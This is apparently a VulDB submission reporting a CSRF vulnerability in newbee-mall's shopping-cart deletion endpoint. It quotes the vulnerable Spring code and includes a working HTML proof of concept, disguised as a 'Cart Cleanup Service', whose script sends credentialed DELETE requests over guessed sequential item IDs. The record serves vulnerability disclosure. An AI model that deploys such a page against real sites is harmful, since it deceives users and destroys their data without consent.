Submission #752803: newbee-ltd newbee-mall v1.0 CSRF Info

Title: newbee-ltd newbee-mall v1.0 CSRF
Description:

# CSRF Vulnerability in Shopping Cart Item Deletion

## Summary

A **CSRF vulnerability** exists in the shopping cart deletion endpoint `/shop-cart/{cartItemId}` (DELETE). Attackers can empty users' shopping carts, causing inconvenience and potential loss of carefully curated selections.

## Vulnerability Details

### Configuration-Level Issue

**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`

```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        // Only the login interceptor is registered: it checks the session, not a CSRF token
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/shop-cart/**"); // ❌ No CSRF token validation
    }
}
```

### Endpoint-Level Code Analysis

**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 93-105)

```java
@DeleteMapping("/shop-cart/{newBeeMallShoppingCartItemId}")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@PathVariable("newBeeMallShoppingCartItemId") Long newBeeMallShoppingCartItemId,
                                               HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Cart item IDs are sequential and predictable
    Boolean deleteResult = newBeeMallShoppingCartService.deleteById(newBeeMallShoppingCartItemId, user.getUserId());
    if (deleteResult) {
        return ResultGenerator.genSuccessResult();
    }
    return ResultGenerator.genFailResult(ServiceResultEnum.OPERATE_ERROR.getResult());
}
```

**Security Issues**:

1. ❌ No CSRF token validation
2. ⚠️ Cart item IDs are predictable (sequential integers)
3. ⚠️ Multiple items can be deleted in a batch

## Proof of Concept (PoC)

```html
<!DOCTYPE html>
<html>
<head>
  <title>Cart Cleanup Service</title>
</head>
<body>
  <h2>Cleaning expired items from cart...</h2>
  <div id="progress">Processing...</div>
  <script>
    // Delete cart items by guessing sequential IDs
    var deletedCount = 0;
    for (var i = 1; i <= 100; i++) {
      fetch('http://localhost:28089/shop-cart/' + i, {
        method: 'DELETE',
        credentials: 'include'
      })
      .then(response => response.json())
      .then(data => {
        if (data.resultCode == 200) {
          deletedCount++;
          document.getElementById('progress').innerHTML = 'Removed ' + deletedCount + ' expired items';
        }
      });
    }
    setTimeout(function() {
      document.getElementById('progress').innerHTML = '✅ Cart cleanup complete!';
    }, 3000);
  </script>
</body>
</html>
```

## Impact

**Shopping cart emptying causing user inconvenience**: users lose their saved shopping selections and must recreate their carts, leading to frustration and potential business loss.

---

**CVSS Score**: 5.3 (Medium)
Source: https://github.com/newbee-ltd/newbee-mall/issues/112
User: flashzyc (UID 92850)
Submitted: 05/02/2026 11:57 (4 months ago)
Moderated: 18/02/2026 07:56 (13 days later)
Status: Duplicate
VulDB Entry: 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Cross-Site Request Forgery]
Points: 0
